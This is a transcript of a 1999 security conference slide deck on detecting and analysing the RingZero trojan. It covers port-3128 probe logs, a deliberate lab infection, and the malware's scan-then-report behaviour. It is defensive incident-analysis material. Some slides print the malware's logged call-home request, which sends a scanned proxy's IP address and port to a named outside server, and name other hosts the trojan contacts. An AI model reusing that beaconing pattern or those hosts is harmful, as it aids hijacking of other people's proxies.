1 / 35

The Hunt For RingZero

The Hunt For RingZero. John Green jegreen@crosslink.net. Outline. A word about Trojans Getting a clue Looking for data How many source hosts? The hunt for the Trojan Game over BoF Findings. Trojans. This is Roland’s home computer, connected to an ISP. Trojans.

xuefang
Download Presentation

The Hunt For RingZero

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. The Hunt ForRingZero John Greenjegreen@crosslink.net

  2. Outline • A word about Trojans • Getting a clue • Looking for data • How many source hosts? • The hunt for the Trojan • Game over • BoF Findings

  3. Trojans This is Roland’s home computer, connected to an ISP

  4. Trojans “Driving the Bus”, NETBUS

  5. Deep Throat - 2140 200.31.13.8 > 158.12.110.1.2140: udp 2 4500 001e e104 0000 7111 8795 ac14 0d08 coa8 6e01 ea60 085c 000a fbb7 3030 8080 0001 0001 0000 0000 0664 6f6e 616c 200.31.13.8 > 158.12.110.2.2140: udp 2 4500 001e e204 0000 7111 8694 ac14 0d08 coa8 6e02 ea60 085c 000a fbb6 3030 0000 0001 0000 0000 0000 0331 3831 0231

  6. Trojans Review • The most well known trojan programs are Netbus and Back Orifice • Protective tools include: all major anti-virus tools, nuke nabber, NFR’s Back Officer Friendly and AtGuard

  7. Getting A Clue • Sept 19, 1999 Roland Grefer writes with an AtGuard detect from his home.com cablemodem • We both commented that probes to tcp port 3128 are not that common

  8. At Guard http://www.atguard.com

  9. More Clues • Sept 21, 1999 - SHADOW analyst Adena Bushrod reports similar activity • Contact other organizations: MITRE, ARL • They see it too!

  10. Proxy Scanning 08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S(0) 08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S(0) 08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S(0)

  11. How Big Is This Thing?! Intrusion detection systems ranging from home computers with cable modems to high end government facilities have been reporting a large number of probes to TCP port 3128, the squid proxy service. If your site has a network monitoring capability and you DO NOT run squid and you detect this pattern over the next two weeks, please let us know by sending email to info@sans.org with intrusion 3128 in the subject line. If you are allowed to send the data trace, please sanitize any of your site's network information (destination host address) and send the data trace as well. Thank you! BIG!

  12. Over 300 3128 MessagesIn Three Days 29;23Sep1999; 7:59:21;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64052;48;25; 30;23Sep1999; 7:59:24;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64053;48;25; 31;23Sep1999; 8:07:30;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;196.15.173.2;xxx.yyy.214.101;3128;64025;44;48; 32;23Sep1999; 8:24:05;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;209.203.121.119;xxx.yyy.124.154;3128;3820;48;25; 33;23Sep1999; 8:24:11;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;194.51.132.171;xxx.yyy.170.248;3128;1195;44;25; 34;23Sep1999; 8:59:23;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;156.46.64.149;xxx.yyy.135.194;3128;2570;44;48; 35;23Sep1999; 9:00:49;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.51.132.171;xxx.yyy.214.228;3128;2932;44;48; 36;23Sep1999; 9:14:51;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;195.44.9.20;xxx.yyy.95.90;3128;1089;44;25; 37;23Sep1999; 9:33:38;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;212.130.192.222;xxx.yyy139.66;3128;2678;48;48; 38;23Sep1999; 9:40:13;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;193.125.239.105;xxx.yyy.1.31;3128;1531;48;48; 39;23Sep1999; 9:56:08;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.249.154.21;xxx.yyy.27.35;3128;2515;44;48; 40;23Sep1999; 9:57:40;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;200.14.243.166;xxx.yyy.123.25;3128;4879;48;25; Over 1000 Source Hosts!

  13. What Are The Possibilities?> 1000 Source Hosts • Spoofed • Worlds largest coordinated attack • Trojan software or “malware”

  14. Source Host Analysis “I am almost certain that these are indeed live, non-spoofed hosts. First, I've dumped the tcpdump traffic with the arriving TTL values. I've done about a dozen traceroutes back to the source IP's and the hop counts are believably close. Also, other clues found in the tcpdump output itself appear to point to different hosts or a very wise crafter. “ Judy Novak - ARL

  15. The First Hot Tip - Sept 23 “We began receiving probes to 3128 on Wednesday, September 15th. The probes come in a triplet - first to TCP port 80, then 8080, then 3128. The probes appear to be going after random addresses. One finally hit a web server listening on port 80 so I got to see what it was doing. It sent the following request to the server:” Anonymous get http://www.rusftpsearch.net/cgi-bin/pst.pl/? pst mode = writeip&pst host=192.168.2.1&pstport=3128 Later verified by four other sources.

  16. So What? “Just a couple additional pieces of information. I only probed back in a rather simple way about 5 machines and found none of those running finger, SMTP or FTP, though all were running TCP port 139, so I concluded (with a very small sample size) it was a Windows attack of some kind, though I admit this is a guess based on sketchy information.” Anonymous

  17. Game Over? “I am the Network Security Officer at Vanderbilt University. I have a system that was infected with a trojan called RingZero and was scanning for ports 80, 8080, and 3128. I have pieces of the code specifically a file called its.exe and a file that was Ring0.vxd. I am still trying to find the original infected file and I suspect that it was a screen saver. If you would like more info give me a call.” Ron Marcum, Vanderbilt

  18. Extreme BoF -Decoding RingZero 7PM - 2AM My Thanks To All Involved!

  19. Basic Game Plan • Move the Vanderbilt files to a “safe” platform for examination • Use strings and other unix utilities to examine the files • Targeting mechanism was a primary interest

  20. Hour 1 - Gameplan Deviation • Strings, etc didn’t get us too far • RingZero uses Ian Luck’s “Petite” program to compress the executables • Tim White volunteers to sacrifice his windows laptop

  21. Hour 2 - Deliberate Infection • Created a mini-network • 2 computers, both running sniffers • Unzipped the archive • Two files: its.exe, pst.exe • it was a “coin-toss”

  22. Hour 3 - Examining ITS.EXE • Ran its.exe • removed itself from the desktop • its.exe and Ring0.xvd placed in \windows\system directory • created an empty its.dat file • No network activity….. :(

  23. Traffic At Last! • After rebooting, the infected machine started doing DNS queries for hosts named: phzforum.virtualave.net xoom.members.com Now we’re getting somewhere!

  24. So What Now? • Created an entry in the infected machine’s hosts file • Gave it the ip address of the sniffer • Infected machine started sending web requests on port 80

  25. Hours 4 and 5 - Reconfiguring the Sniffer Machine • Switched to Linux • Ran Apache and tcpdump • Apache logs showed that its.exe was trying to retrieve an its.dat file from the webservers • phzforum.virtualave.net/its.dat • xoom.members.com/harmer/its.dat

  26. What Should Be In ITS.DAT? • its.dat no longer existed on phzforum.virtualave.net • Terminal room closed before we discovered the xoom.members.com connection • its.dat was found the following morning, but it is encrypted?

  27. Party Over? - Nope! • Getting very late • Oak Room closed • Remaining BoF members relocated to a corner, downstairs in LaSalle’s

  28. Hours 6 and 7 Running The PST.EXE File • Ran PST.EXE • Initial behavior was the same as the its.exe • relocated itself, etc. PST.EXE spewed packets to ports 80, 8080, and 3128!

  29. PST.EXE Behavior • Generated a small list of “random?” IP addresses • Scanned all IPs for port 80, then 8080, and finally 3128 • Repeated

  30. What Is It Doing Though? • Since the scan was sequential, we were able to configure apache “on-the-fly” to answer web requests for IPs in the scan. • Examining the Apache logs showed what we had hoped for:

  31. The End Game get http://www.rusftpsearch.net/cgi-bin/pst.pl/? pst mode = writeip&pst host=192.168.2.1&pstport=3128 The proxy is being used to send its own IP address and proxy port home to the “mothership” !

  32. Review of Findings • ITS.EXE attempts to retrieve files from various webservers • PST.EXE is the active scanner • doesn’t require the its.dat file to run • discovered proxies send their IPs to www.rusftpsearch.net

  33. Questions Still Remain • Infection mechanism? • How does it start at boot time? • What is the its.dat file for? • Targeting • Scan intensity dial • Attack configuration

  34. Implications? Quantum leap in distributed attack technology • Viral infection rates • Configurable - its.dat • scanning -> attacking? • Automatic result consolidation

  35. Thank you

More Related